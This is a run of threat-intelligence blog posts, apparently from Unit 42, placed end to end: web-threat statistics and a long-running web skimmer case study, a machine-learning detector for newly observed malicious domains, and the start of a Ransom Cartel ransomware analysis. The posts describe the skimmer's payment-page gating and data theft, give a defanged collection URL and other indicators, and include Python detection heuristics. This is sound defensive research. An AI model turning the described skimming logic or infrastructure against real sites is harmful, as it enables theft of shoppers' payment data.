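print(f"landing URLs per domain: {landing_ratio:.2f}")  # 5.24
print(f"host URLs per domain:    {host_ratio:.2f}")     # 10.21
```

On these totals, each hosting domain carries roughly twice as many unique URLs as each landing domain.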

After identifying the apparent geographical locations of these domains, we found that the majority of them also seem to originate from the United States – as we observed for web threats generally. Figure 6 below shows the heat map.

Choropleth map showing the geolocation distribution of malicious host URLs from January-March 2022
Figure 6. Web threats malicious host URLs’ domain geolocation distribution January-March 2022.

Figure 7 shows the top eight countries where the owners of these domain names appeared to be located.

Pie chart showing distribution of originating country of malicious host URLs from January-March 2022. United States - 66.0%, Germany - 4.2%, Russia - 3.4%, France - 1.6%, Brazil - 1.5%, Netherlands - 1.3%, United Kingdom - 1.2%, Italy - 1.1%, Others - 19.7%
Figure 7. Top eight countries where web threats malicious host URLs’ domains appeared to be located January-March 2022.

Web Threats Malware Class Analysis

The top five web threats we observed are cryptominers, JavaScript (JS) downloaders, web skimmers, web scams and JS redirectors. Please refer to our previous analysis for the definition of these classes: “The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More”.

As shown in Figure 8, JS downloader threats showed the most activity at the start of 2022, followed by web miners (aka cryptominers) and web skimmers, which was similar to the previous quarter.

Bar chart showing js_downloader, web_miner, web_skimmer, js_redirector and web_scam on the X-axis, and 0-1,000,000 on the Y-axis. Key indicates blue bars are all hits, and red bars are unique hits. Js_downloader = 889,106 total hits: 70,081 unique hits. Web_miner = 463,611 total hits: 25,917 unique hits. Web_skimmer = 351,660 total hits: 29,728 unique hits. Js_redirector = 192,096 total hits: 4,990 unique hits. Web_scam = 80,158 total hits: 12,401 unique hits.
Figure 8. Top five web threats category distribution January-March 2022.

Web Threats Malware Family Analysis

Based on our classification of web threats explained in the previous section, we further categorized them by malware family. The family is important to understanding how threats work since threats in the same family share similar JS code, even if the HTML landing pages where they appear have different layouts and styles.

As we did in our yearly analysis, The Year in Web Threats: Web Skimmers Take Advantage of Cloud Hosting and More, we identified pieces of malware as part of a family by checking for certain characteristics: similar code patterns or behaviors, or indications of having originated from the same attacker.

Figure 9 shows the number of snippets observed from the top 18 malware families we identified. As we’ve seen previously, there were fewer families of cryptominers and JS downloaders, while web skimmers showed more diversity in code and behavior.

Bar chart showing the web threat families along the X-axis, and 0-200,000 on the Y-axis. Key indicates that blue bars are total hits, and red bars are unique hits. There are 3 Coinhive families, 8 skimmer families, 4 downloader families, 1 redirector family, and 2 web scam families represented.
Figure 9. Web threats malware family distribution January-March 2022.

Web Threats Case Study

Among all of the web threats we detected during this analysis, the most notable was a web skimmer that we identified, which has been active for the last five years.

As shown in Figure 10, the source code of this web skimmer was injected into the target web page as lightly obfuscated JS code.

Lightly obfuscated JS source code injected into the target web page
Figure 10. Source code of a web skimmer that has been active for at least five years.

After deobfuscating and clarifying the JS code as shown in Figure 11, we can extract the collection server of the web skimmer: cloudfusion[.]me. This web skimmer is simple, yet classic.

It checks whether the current URL is the payment page by comparing the window.location.href property with the strings onepage or checkout. If a match is found, the code collects the inputs from the input and select elements (as well as other sensitive information from customers) when the button is clicked.

The code then sends that information to the remote collection server, https://cloudfusion[.]me/cdn/jquery.min.js, which is controlled by the attacker.
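
The gating logic described above can be sketched from a defender's point of view. The Python below is a naive illustration, not our detection logic: is_payment_page mirrors the skimmer's URL check, and looks_like_skimmer is a hypothetical heuristic that flags script text combining the same three traits (reading location.href, payment-page keywords, and input/select harvesting). Both function names are our own, and a heuristic this simple would produce false positives on legitimate checkout code.

```python
import re

# Strings the skimmer compares against window.location.href, per the analysis above.
PAYMENT_KEYWORDS = ("onepage", "checkout")


def is_payment_page(url: str) -> bool:
    """Mirror the skimmer's gate: does the URL contain a payment-page keyword?"""
    return any(keyword in url for keyword in PAYMENT_KEYWORDS)


def looks_like_skimmer(js_source: str) -> bool:
    """Naive triage heuristic (an assumption for illustration, not a real signature)."""
    reads_location = "location.href" in js_source
    checks_payment = any(keyword in js_source for keyword in PAYMENT_KEYWORDS)
    harvests_fields = re.search(r"\b(input|select)\b", js_source) is not None
    return reads_location and checks_payment and harvests_fields


sample = (
    "if (window.location.href.indexOf('checkout') > -1) {"
    " var fields = document.querySelectorAll('input, select'); }"
)
print(is_payment_page("https://shop.example/checkout/cart"))  # True
print(looks_like_skimmer(sample))                              # True
```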

Deobfuscated source code showing the address of the remote collection server
Figure 11. Deobfuscated source code of the web skimmer that has been active at least five years.

As early as 2017, researchers reported that this web skimmer pretended to be a part of the jQuery library. From our detection data, we found that this web skimmer is still very active in 2022.

There are 27,917 URLs from 14 different websites that the attacker injected with this web skimmer family. Based on our telemetry, this threat is one of the most active web skimmers in recent history.

There is a malicious JavaScript file named jquery.min.js, which is hosted on the server controlled by the attacker. It is responsible for receiving sensitive information sent by the web skimmer. By searching for the SHA value of jquery.min.js as shown in Figure 12, we can see it was once hosted on different IP addresses that were located in Germany and Russia.

Virus Total relations tab results for jquery.min.js showing different in-the-wild IP addresses in Germany and Russia
Figure 12. Relations about jquery.min.js

Since March 13, 2020, cloudfusion[.]me has pointed to the following IP addresses:

  • 198.54.117[.]197
  • 198.54.117[.]198
  • 198.54.117[.]199
  • 198.54.117[.]200

These IP addresses are actively involved in other malware campaigns, such as the following Trojan (SHA256: 992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1f). This Trojan connects to these IPs through the domain voques-tfr[.]xyz.

Although this domain is not resolvable anymore, we analyzed the malware traffic based on another similar request to the URL www.misuperblog[.]com/tmz/?sRjPP6ZH=21Ru2Nt5y6IynFa8dNKfckGmLKuTraB2ebSZxsJ3CJwKQtaV8aXvWfS0YurLHqXx0CGvRSPYnS9vGtnwfQCtQg==&EZ442V=IbnToV6xqdfx. We found that this URL loads obfuscated JS that triggers several redirects to an adult website (yhys93[.]site).

Conclusion

As we highlighted in this blog, this quarter’s most prevalent web threats were cryptominers, JS downloaders, web skimmers, web scams and JS redirectors. Of the landing URLs we analyzed, the top three industry verticals targeted by attackers were business and economy sites, personal sites and blogs, and shopping sites.

Furthermore, we found an old web skimmer is still active after five years. This shows that old threats can remain popular for long periods of time, and that it is critical for users to exercise caution when visiting unfamiliar sites.

While cybercriminals continue to seek opportunities for malicious cyber activities, Palo Alto Networks customers benefit from protection against web threats discussed in this blog and many others, via our Advanced URL Filtering and Advanced Threat Prevention cloud-delivered security subscriptions.

We also recommend the following actions:

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Indicators of Compromise

Malicious Web Skimmer SHA256:

79eedf9c1b974992a4beada1bd6343ecadece0b413acccd4deded4a49a4ad220
992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1f

Acknowledgements

We would like to thank Billy Melicher, Alex Starov, Jun Javier Wang, Mitchell Bezzina, Ashraf Aziz and Jen Miller Osborn for their help with the blog.

Detecting Emerging Network Threats From Newly Observed Domains

Executive Summary

In May 2021, Palo Alto Networks launched a proactive detector employing state-of-the-art methods to recognize malicious domains at the time of registration, with the aim of identifying them before they are able to engage in harmful activities. The system scans newly registered domains (NRDs) and detects potential network abuses. However, the proactive detector has limitations; created to only focus on new domains, it cannot obtain and analyze malicious indicators appearing after a domain's creation. In addition, in the cases of adversaries leveraging or compromising aged domains to carry out attack traffic, the proactive detector fails to capture the emerging threats because the malicious domains are out of the scope of being considered NRDs.

In addition to scanning for potential abuses at the time of registration, we have another great opportunity to detect malicious domains proactively when they start carrying attack traffic. A malicious domain may be registered long before it serves its attacking campaign and exposes indicators of abuse. Once the domain starts carrying malicious traffic, we can observe its DNS requests from passive DNS. To block network threats at this early stage, we developed a new proactive detector that ingests newly observed domains (NODs) to discover potential threats among them. The new detector leverages various machine learning techniques to expose suspicious behaviors based on various information about NODs, including their latest WHOIS records and DNS traffic.

This blog will illustrate how we collect and analyze the enriched features available for NODs to detect emerging threats. Our detector scans 2.6 million NODs and captures around 2,300 suspicious domains every day. To evaluate the performance, we cross-checked the detected domains against other threat intelligence from VirusTotal. 33.08% of the NODs detected by our system were also labeled as malicious by other sources later. But our detector's average discovery time is 4.79 days earlier than any VirusTotal vendor. Furthermore, we will explain the new system's benefits with case studies about various network abuses such as command and control (C2), phishing and unethical search engine optimization (SEO) practices. We will discuss how the proactive detector captured and blocked these threats based on different indicators for cybercriminal activities.

Once the proactive detector captures a potentially harmful domain, the knowledge is distributed from DNS Security to other Palo Alto Networks Cloud-Delivered Security Services, including URL Filtering and WildFire.

Related Unit 42 Topics DNS Security

Detection Methods and High-level Statistics

Palo Alto Networks collects passive DNS data from multiple sources, including our DNS Security service, as well as external providers from all around the world. Our cloud-based passive DNS system can ingest and process about 13 million DNS logs each day. The data ingestion pipeline catches the latest DNS data every hour and extracts the domains that haven't been seen carrying traffic before. These domains will be forwarded to the proactive detector to identify emerging threats. Our system can capture and scan about 2.6 million NODs daily.
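
The extraction step can be pictured as a set difference between each hourly batch and everything seen so far. The sketch below is a minimal illustration under that assumption; the function name, the in-memory set and the .example domains are hypothetical, and a production pipeline at this scale would need persistent, distributed storage instead.

```python
from typing import Iterable, List, Set


def extract_newly_observed(batch: Iterable[str], seen: Set[str]) -> List[str]:
    """Return domains in this batch that were never seen before, and remember them."""
    new_domains = []
    for domain in batch:
        # Normalize case and the optional trailing root dot before comparing.
        normalized = domain.strip().lower().rstrip(".")
        if normalized and normalized not in seen:
            seen.add(normalized)
            new_domains.append(normalized)
    return new_domains


seen_domains: Set[str] = {"example.com"}
hour_1 = ["example.com", "New-Site.example.", "new-site.example"]
hour_2 = ["new-site.example", "another.example"]

first_batch = extract_newly_observed(hour_1, seen_domains)
second_batch = extract_newly_observed(hour_2, seen_domains)
print(first_batch)   # ['new-site.example']
print(second_batch)  # ['another.example']
```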

Number of newly observed domains shown in blue bars. Detection percentage shown in red line. Period covered is April 27, 2022-May 23, 2022
Figure 1. Daily NOD amount and the percentage flagged as suspicious.

For each NOD, our centralized data collector will actively crawl all related information, including the latest WHOIS record and all DNS traffic requesting the domain and its subdomains. To leverage a variety of malicious indicators, we developed individual machine learning models to analyze different information. Specifically, we built a reputation system to evaluate WHOIS records, applied multiple classification models to DNS-related features, and used a bigram model to analyze hostnames. These models captured about 2,323 unique potentially malicious NODs every day. Figure 1 shows the daily NOD amount and detection rate from April 27-May 23, 2022.
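
To give a feel for how a bigram model can score hostnames, here is a minimal character-bigram sketch. It is not the production model: the tiny training list, the add-one smoothing and the class name are all assumptions made for illustration. The idea is that names built from common letter pairs receive a higher average log-probability than random-looking strings.

```python
import math
from collections import Counter
from typing import Iterable


class BigramModel:
    """Character bigram model with add-one smoothing (illustrative only)."""

    def __init__(self, training_names: Iterable[str]):
        self.pair_counts = Counter()
        self.first_counts = Counter()
        self.alphabet = set()
        for name in training_names:
            padded = f"^{name.lower()}$"  # mark start and end of the name
            self.alphabet.update(padded)
            for a, b in zip(padded, padded[1:]):
                self.pair_counts[(a, b)] += 1
                self.first_counts[a] += 1

    def avg_log_prob(self, name: str) -> float:
        """Average log-probability per bigram; higher means more 'word-like'."""
        padded = f"^{name.lower()}$"
        vocab = len(self.alphabet) + 1  # one extra bucket for unseen characters
        total = 0.0
        for a, b in zip(padded, padded[1:]):
            prob = (self.pair_counts[(a, b)] + 1) / (self.first_counts[a] + vocab)
            total += math.log(prob)
        return total / (len(padded) - 1)


# Hypothetical training words; a real model would train on a large benign corpus.
model = BigramModel([
    "google", "amazon", "payment", "download", "cloud", "support",
    "account", "online", "secure", "banking", "network", "service",
])
wordlike = model.avg_log_prob("payments")
randomlike = model.avg_log_prob("twtyowq")
print(wordlike > randomlike)  # True
```

In practice the score would be one feature among many, with a threshold tuned on labeled data.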

Number of days between when a domain is considered a newly registered domain (NRD) and when it is considered a newly observed domain (NOD). The graph shows the cumulative distribution function of their dormant periods.
Figure 2. Malicious NOD Dormant Period CDF.

To analyze attackers' behaviors, we compare the registration date of potentially malicious NODs and the date when they start hosting DNS traffic to see how long they keep silent before activation. Figure 2 presents the cumulative distribution function (CDF) of their dormant periods. The malicious domains start carrying traffic 5.57 days after their registration on average. However, during the period studied, our detector captured 152 NODs involving network abuses more than one year after creation – some domains can lie dormant for a significant amount of time before beginning malicious activity.
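
The dormant period and its CDF are straightforward to compute once registration and first-seen dates are available. The following sketch uses made-up dates purely for illustration; the function names are our own.

```python
from datetime import date
from typing import List, Tuple


def dormant_days(registered: date, first_seen: date) -> int:
    """Days between registration and the first observed DNS traffic."""
    return (first_seen - registered).days


def empirical_cdf(values: List[int]) -> List[Tuple[int, float]]:
    """Return (value, fraction of samples <= value) for each distinct value."""
    ordered = sorted(values)
    n = len(ordered)
    cdf: List[Tuple[int, float]] = []
    for i, value in enumerate(ordered, start=1):
        if cdf and cdf[-1][0] == value:
            cdf[-1] = (value, i / n)  # collapse ties onto the last occurrence
        else:
            cdf.append((value, i / n))
    return cdf


# Hypothetical (registration date, first-seen date) pairs.
samples = [
    (date(2022, 4, 12), date(2022, 4, 12)),
    (date(2022, 4, 1), date(2022, 4, 4)),
    (date(2022, 3, 1), date(2022, 3, 4)),
    (date(2021, 1, 1), date(2022, 5, 1)),
]
periods = [dormant_days(reg, seen) for reg, seen in samples]
cdf = empirical_cdf(periods)
print(periods)  # [0, 3, 3, 485]
print(cdf)      # [(0, 0.25), (3, 0.75), (485, 1.0)]
```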

The cumulative distribution function of how many days before any vendor of VirusTotal the proactive detector was able to flag malicious domains among newly observed domains.
Figure 3. Early discovery time CDF.

Of all suspicious NODs detected by the new proactive system, 37.11% were labeled as confirmed malicious 30 days later by Palo Alto Networks or other threat intelligence vendors in VirusTotal. Figure 3 shows the CDF of how many days before any vendor on VirusTotal the proactive detector was able to flag malicious domains. On average, our detector can capture these malicious domains and isolate their traffic 4.79 days before any VirusTotal vendor blocks them. Furthermore, we can discover 19.47% of malicious NODs more than a week earlier than others.

Broader Visibility Into Emerging Internet Threats

One major benefit of our new proactive malicious NOD detector is that it extends visibility into emerging attacking domains. The previous proactive detector scans threats among NRDs only. However, not all top-level domains (TLDs) disclose their new domains to the public. For example, hundreds of country-level TLDs are maintained by governments. Access to their complete domain list or WHOIS database is restricted.

Let's take a malicious domain within the .ga TLD, for instance. Our proactive detector captured and labeled the NOD payment-downlaods[.]ga as grayware on March 4. .ga is the country code TLD for Gabon. This TLD offers free domain registration, but its domains’ creation dates are not available in the WHOIS records. Therefore, we cannot directly confirm .ga NRDs based on the registration information. Monitoring passive DNS data is the primary way to detect recently active .ga domains. We caught payment-downlaods[.]ga carrying C2 traffic 12 days after we first observed its DNS traffic. The domain served Android Package Kit (APK) spyware that attempted to steal private information including SMS messages (SHA256: e9ad04ae0201307e061cdae350c392a6b4537876991b2c97857ea71086fa0496).

Besides textual characteristics, the WHOIS record is another important feature that can be used for proactive malicious domain detection. It can expose various network abuse warning signs such as registrants, registrars and name servers. Our malicious NOD detector will actively crawl new domains’ WHOIS records for analysis once we observe their DNS traffic.

For example, our detector blocked a phishing domain within the .ml TLD as soon as we observed it in passive DNS data on May 10. The centralized WHOIS database for .ml is not publicly available, so the detectors focusing on NRDs failed to inspect this domain. However, once it began to carry traffic, the proactive malicious NOD detector crawled its WHOIS record and found the name server is offshoreracks[.]com, which provides an offshore and anonymous hosting service. Besides this questionable name server, the NOD's registrar also has a bad reputation. The NOD is a squatting domain mimicking a major international banking group based in Italy. The phishing website copied the text from the official site but with fake contact information. Interestingly, despite mimicking an Italian bank, the website uses Turkish, so it's likely intended to target Turkish victims.
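
One simple way to think about a WHOIS reputation system is to score each registrar or name server by the share of previously seen domains using it that turned out to be malicious. The sketch below illustrates that idea only; it is not the scoring used by our detector, and the field names, function names and .example values are hypothetical.

```python
from collections import defaultdict
from typing import Dict, Iterable, Tuple


def build_reputation(history: Iterable[Tuple[str, bool]]) -> Dict[str, float]:
    """Map each value (e.g., a name server) to the malicious share of past domains using it."""
    totals: Dict[str, int] = defaultdict(int)
    bad: Dict[str, int] = defaultdict(int)
    for value, was_malicious in history:
        totals[value] += 1
        if was_malicious:
            bad[value] += 1
    return {value: bad[value] / totals[value] for value in totals}


def whois_risk(record: Dict[str, str], reputations: Dict[str, Dict[str, float]]) -> float:
    """Risk of a WHOIS record = worst reputation among its known fields (0.0 if none known)."""
    scores = [reputations.get(field, {}).get(value, 0.0) for field, value in record.items()]
    return max(scores, default=0.0)


# Hypothetical labeled history: (attribute value, was the domain malicious?).
reputations = {
    "name_server": build_reputation([
        ("ns.anon-hosting.example", True),
        ("ns.anon-hosting.example", True),
        ("ns.anon-hosting.example", False),
        ("ns.big-provider.example", False),
    ]),
    "registrar": build_reputation([
        ("Cheap Registrar (hypothetical)", True),
        ("Cheap Registrar (hypothetical)", False),
    ]),
}
record = {"name_server": "ns.anon-hosting.example", "registrar": "Cheap Registrar (hypothetical)"}
risk = whois_risk(record, reputations)
print(round(risk, 2))  # 0.67
```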

Capture More Malicious Indicators

Unlike the WHOIS record, which is available once a domain is created, some indicators of cybercriminal activity will only be exposed after a malicious domain starts carrying attacking traffic. Therefore, our detector also analyzes the DNS traffic of NODs to capture any suspicious behaviors.

Example of a scam page hosted on a DGA subdomain that asks for notification permissions. The presence of a large number of subdomains produced by DGAs can be an indicator that a newly observed domain is suspicious.
Figure 4. Black hat SEO page hosted on DGA subdomain of twtyowq[.]tk.

One of the abnormal DNS traffic patterns that is highly related to network threats is the presence of a large number of subdomains produced by domain generation algorithms (DGAs). Attackers could use these subdomains to exfiltrate stolen information or perform black hat search engine optimization (SEO) with wildcard DNS. Our proactive detector leverages this indicator to identify potentially abused NODs.

Let's take a pop-up advertising campaign that we detected as an example. This campaign was distributed through .tk domains such as twtyowq[.]tk, bsdybwo[.]tk and bwafduj[.]tk. The creation time of .tk domains is unavailable so we cannot obtain any NRDs under this zone. However, when we first saw these domains' DNS traffic, each of them had hundreds of DGA subdomains hosting scam pages asking for notification permission and redirecting visitors to unwanted ads (see Figure 4).
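
As a rough illustration of this indicator, the sketch below counts random-looking subdomain labels under a domain using Shannon entropy. Entropy is a stand-in chosen for simplicity, not the method our detector uses; the thresholds, function names and the two random-looking subdomains in the example are made up.

```python
import math
from collections import Counter
from typing import Iterable


def shannon_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of a DNS label."""
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(label: str, min_len: int = 8, min_entropy: float = 3.0) -> bool:
    """Assumed thresholds: long labels with high character entropy look generated."""
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


def count_random_subdomains(hostnames: Iterable[str], registered_domain: str) -> int:
    """Count distinct random-looking labels directly under the registered domain."""
    suffix = "." + registered_domain
    labels = set()
    for host in hostnames:
        host = host.lower().rstrip(".")
        if host.endswith(suffix):
            labels.add(host[: -len(suffix)].split(".")[-1])
    return sum(looks_random(label) for label in labels)


observed = [
    "x7k2qvz9p1.twtyowq.tk",  # hypothetical subdomain for illustration
    "m3n8bw4ytr.twtyowq.tk",  # hypothetical subdomain for illustration
    "www.twtyowq.tk",
    "mail.example.com",
]
random_count = count_random_subdomains(observed, "twtyowq.tk")
print(random_count)  # 2
```

A domain would only be flagged when this count is large relative to its total subdomains, which is a tuning decision left out of the sketch.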

Traffic from gateway domains such as jxc786[.]com will reach this gambling website, but if a visitor opens the subdomain directly, they are redirected to a search engine for cloaking.
Figure 5. Gambling website hosted on jxc786[.]com.

Besides explicit DGA subdomains, our detector digs deeper into NODs' DNS logs to expose DGA traffic hidden behind them. For example, the domain jxc786[.]com was registered on April 23, but we didn't see any evidence of cybercriminal activity at that time. However, it started pointing to b136jishiang01hy.bakbitionb[.]com on May 22. bakbitionb[.]com is the infrastructure domain for a gambling campaign. In passive DNS, this domain has hundreds of DGA subdomains associated with different gateway domains through CNAME records. If visitors directly open these DGA subdomains in their browsers, they will be redirected to baidu[.]com for cloaking. However, traffic from gateway domains such as jxc786[.]com will reach the gambling website shown in Figure 5.
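
The relationship between gateway domains and an infrastructure domain can be recovered by grouping CNAME records by their target. The sketch below is a simplified illustration: the function names are our own, the "last two labels" rule for finding the registered domain is a shortcut (a real implementation should consult the Public Suffix List), and every record except the jxc786 one is hypothetical.

```python
from collections import defaultdict
from typing import Dict, Iterable, Set, Tuple


def registered_domain(hostname: str) -> str:
    """Naive registered-domain extraction: keep the last two labels (assumption)."""
    return ".".join(hostname.lower().rstrip(".").split(".")[-2:])


def gateways_per_infrastructure(
    cname_records: Iterable[Tuple[str, str]]
) -> Dict[str, Set[str]]:
    """Group source domains by the registered domain of their CNAME target."""
    groups: Dict[str, Set[str]] = defaultdict(set)
    for source, target in cname_records:
        src, dst = registered_domain(source), registered_domain(target)
        if src != dst:  # ignore CNAMEs that stay inside the same domain
            groups[dst].add(src)
    return dict(groups)


records = [
    ("jxc786.com", "b136jishiang01hy.bakbitionb.com"),  # from the case above
    ("gateway-one.example", "x1.bakbitionb.com"),       # hypothetical
    ("www.shop.example", "cdn.shop.example"),           # hypothetical, same domain
]
groups = gateways_per_infrastructure(records)
print(sorted(groups["bakbitionb.com"]))  # ['gateway-one.example', 'jxc786.com']
```

An infrastructure domain that collects many unrelated gateway domains in this grouping is worth a closer look.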

A phishing page hosted on a subdomain as part of an attempt to use levelsquatting to impersonate Apple.
Figure 6. Fake iCloud account recovery page hosted on asuna-sao[.]us.

The proactive detector can also discover and block levelsquatting subdomains from NODs’ passive DNS records. The levelsquatting technique includes a legitimate website’s domain as a subdomain in order to trick visitors into thinking they have arrived at the legitimate website. It is commonly used in conjunction with phishing attacks.

For example, our system recognized multiple subdomains of asuna-sao[.]us as levelsquatting hostnames masquerading as Apple Inc and labeled the domain as dangerous. The domain was registered on April 12 and started receiving traffic for subdomains like www.flnd-appleld.asuna-sao[.]us, www.lcloud-supoort.asuna-sao[.]us and www.apple-flnd.asuna-sao[.]us on the same day. These hostnames all deliver the same phishing page, which tries to steal Apple ID credentials (Figure 6).
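
A very basic levelsquatting check looks for brand keywords in the subdomain portion of a hostname whose registered domain does not belong to that brand. The sketch below is illustrative only: the keyword table and function names are assumptions, the registered domain is taken naively as the last two labels (a real implementation should use the Public Suffix List), and plain substring matching misses lookalike spellings such as lcloud, which would need fuzzy or homoglyph-aware matching.

```python
from typing import Dict, List

# Hypothetical keyword table: brand keyword -> legitimate registered domain.
BRAND_KEYWORDS: Dict[str, str] = {"apple": "apple.com", "icloud": "icloud.com"}


def registered_domain(hostname: str) -> str:
    """Naive registered-domain extraction: keep the last two labels (assumption)."""
    return ".".join(hostname.lower().rstrip(".").split(".")[-2:])


def levelsquatting_hits(hostname: str) -> List[str]:
    """Return brand keywords found in the subdomain part of a non-brand domain."""
    host = hostname.lower().rstrip(".")
    reg = registered_domain(host)
    subdomain_part = host[: -len(reg)].rstrip(".")
    return sorted(
        keyword
        for keyword, legit in BRAND_KEYWORDS.items()
        if keyword in subdomain_part and reg != legit
    )


print(levelsquatting_hits("www.flnd-appleld.asuna-sao.us"))    # ['apple']
print(levelsquatting_hits("www.apple-flnd.asuna-sao.us"))      # ['apple']
print(levelsquatting_hits("www.lcloud-supoort.asuna-sao.us"))  # [] (lookalike missed)
print(levelsquatting_hits("support.apple.com"))                # []
```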

Capture Aged Malicious Domains

In previous writing on strategically aged domains, we reported that some had been registered years before they were actively involved in cybercriminal campaigns. These domains didn't reveal any indicator for network abuses when they were created. Monitoring NODs gives us a second chance to capture aged malicious domains.

A rogue advertising page hosted shortly after the domain's WHOIS record was updated, illustrating how it can be important to check newly observed domains for malicious indicators even if they were benign at the time of registration.
Figure 7. Advertisement page hosted on createruler[.]com.

When crawling NODs' WHOIS records, we discover that many aged domains have recent WHOIS record changes before they are involved in network abuses. For example, createruler[.]com was registered in May 2022. Its WHOIS was updated on June 3, 2022. Then the domain started hosting a rogue advertising page, as shown in Figure 7. Our proactive detector analyzed its latest WHOIS record and classified it as suspicious based on its use of a highly abused name server. The name server is a parking service provider that monetizes domains' traffic through advertisement networks. This kind of parking site could expose visitors to various threats, such as malware distribution, potentially unwanted program (PUP) distribution and phishing scams.

The proactive detector also captured some domains repeatedly leveraged by network threats. For example, we captured a squatting domain mimicking a major digital payment network based in the United States. It used to serve a phishing campaign in 2020 and expired in 2021. But the adversary registered it again on March 13, 2022. Our detector observed it started carrying traffic and recognized it as a potentially malicious NOD on Sept. 2, 2022. The domain hosts a rogue website that tags the legitimate target domain on the index page and tries to collect the visitor's contact information. This website is highly suspicious and likely to be engaged in network fraud.

Conclusion

At Palo Alto Networks, we extract NODs from passive DNS and proactively detect potential cybercriminal activities among them. The new detector leverages various machine learning techniques to capture indicators of network abuse from WHOIS records, DNS traffic and lexical features. The system extends our visibility into emerging network threats and identifies new kinds of suspicious behaviors. As a result, every day it can discover about 2,323 potentially malicious domains as soon as they become active, protecting our customers on average 4.79 days before the domains are confirmed to be involved in attacking campaigns.

Palo Alto Networks identifies the detected domains with the grayware category through our cloud-delivered security services for Next-Generation Firewalls, including URL Filtering and DNS Security. Our customers receive protections against damage from risky domains mentioned in this blog, as well as additional risky domains captured by our system.

Indicators of Compromise

C2 Domain

payment-downlaods[.]ga

Phishing Domains

asuna-sao[.]us
intesa-sanpaola[.]ml
zellesupport[.]info

Grayware Domains

bakbitionb[.]com
bsdybwo[.]tk
bwafduj[.]tk
createruler[.]com
jxc786[.]com
twtyowq[.]tk

SHA256

e9ad04ae0201307e061cdae350c392a6b4537876991b2c97857ea71086fa0496

Ransom Cartel Ransomware: A Possible Connection With REvil

Executive Summary

Ransom Cartel is ransomware as a service (RaaS) that surfaced in mid-December 2021. This ransomware performs double extortion attacks and exhibits several similarities and technical overlaps with REvil ransomware. REvil ransomware disappeared just a couple of months before Ransom Cartel surfaced and just one month after 14 of its alleged members were arrested in Russia. When Ransom Cartel first appeared, it was unclear whether it was a rebrand of REvil or an unrelated threat actor who reused or mimicked REvil ransomware code.

In this report, we will provide our analysis of Ransom Cartel ransomware, as well as our assessment of the possible connections between REvil and Ransom Cartel ransomware.

Palo Alto Networks customers receive help with the detection and prevention of Ransom Cartel ransomware through the following products and services: Cortex XDR and Next-Generation Firewalls (including cloud-delivered security services such as WildFire).

If you think a cyber incident may have impacted you, the Unit 42 Incident Response team is available 24/7/365. You can also take preventative steps by requesting any of our cyber risk management services.

Indicators of compromise and Ransom Cartel-associated tactics, techniques and procedures (TTPs) can be found in the Ransom Cartel ATOM.

We updated this blog on Oct. 15 based on further analysis, additional evidence and discussion around the complexities of redirects from REvil’s dark web leak site. Updated sections include our History of the REvil Disappearance and the Ransom Cartel Overview.

Related Unit 42 Topics Ransomware, REvil

History of the REvil Disappearance

In October 2021, REvil operators went quiet. REvil’s dark web leak site became unreachable. Around mid-April 2022, individual security researchers and cybersecurity media outlets reported a new development with REvil that could signify the gang’s return. REvil’s name-and-shame blogs at the dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd[.]onion and aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion domains started redirecting users to a new name-and-shame blog available at blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd[.]onion/Blog.

This redirect was documented in our post, “Understanding REvil,” in Bleeping Computer’s post on REvil’s TOR sites redirecting to a new ransomware operation and in a Twitter post from vx-underground.

Later the same day, the redirect was removed (as noted by vx-underground). At the time, it was not possible to make a definitive attribution stating which group was behind the redirect because the new name-and-shame blog did not claim any name or affiliation.

At the start of the redirect, no breached organizations were listed on the site. Over time, the threat actors began adding records that had appeared on “Happy Blog,” mostly from late April to October 2021. They also included the old file-sharing links previously used by REvil as proof of compromise.

The newly established blog listed a Tox Chat ID for communication with the ransomware operator. The blog hinted at its operators’ connection to REvil with the claim that the newer group offered “the same, yet improved software.”

Unit 42 initially believed that this blog was linked to Ransom Cartel and that the “improved software” the threat actors referred to was a new Ransom Cartel variant. However, after further analysis and seeing more evidence, we believe it is also possible that the name-and-shame blog and Ransom Cartel are two separate operations. 

Whether this blog is operated by Ransom Cartel or a different group, what is clear is that, while REvil may have disappeared, its malicious influence has not. The operator of the newly established blog appears to have some type of access to REvil or ties to the group. At the same time, our analysis of Ransom Cartel samples (detailed in the sections below) provides strong evidence of ties to REvil as well. 

To read more about REvil, its disappearance and the redirect, please refer to our blog, Understanding REvil.

Ransom Cartel Overview

We first observed Ransom Cartel around mid-January 2022. Security researchers at MalwareHunterTeam believe the group to have been active since at least December 2021. They observed the first known Ransom Cartel activity and noticed several similarities and technical overlaps with REvil ransomware.

There are a number of theories about the origins of Ransom Cartel. One theory in the community suggests that Ransom Cartel could be the result of multiple groups merging. However, researchers at MalwareHunterTeam have put forward that one of the groups believed to have merged has denied any connection with Ransom Cartel. Additionally, Unit 42 has seen no connection between these groups and Ransom Cartel other than that many of them have connections to REvil. 

At this time, we believe that Ransom Cartel operators had access to earlier versions of REvil ransomware source code, but not some of the most recent developments (see our Ransom Cartel and REvil Code Comparison for more details). This suggests there was a relationship between the groups at some point, though it may not have been recent.

Unit 42 has also observed Ransom Cartel group breaching organizations, with the first known victims observed by us around January 2022 in the U.S. and France. Ransom Cartel has attacked organizations in the following industries: education, manufacturing, and utilities and energy. Unit 42 incident responders have also assisted clients with response efforts in several Ransom Cartel cases.

Like many other ransomware gangs, Ransom Cartel leverages double extortion techniques. Unit 42 has observed the group taking an aggressive approach, threatening not only to publish stolen data to their leak site, but also to send it to the victim’s partners, competitors and the news in an effort to inflict reputational damage.

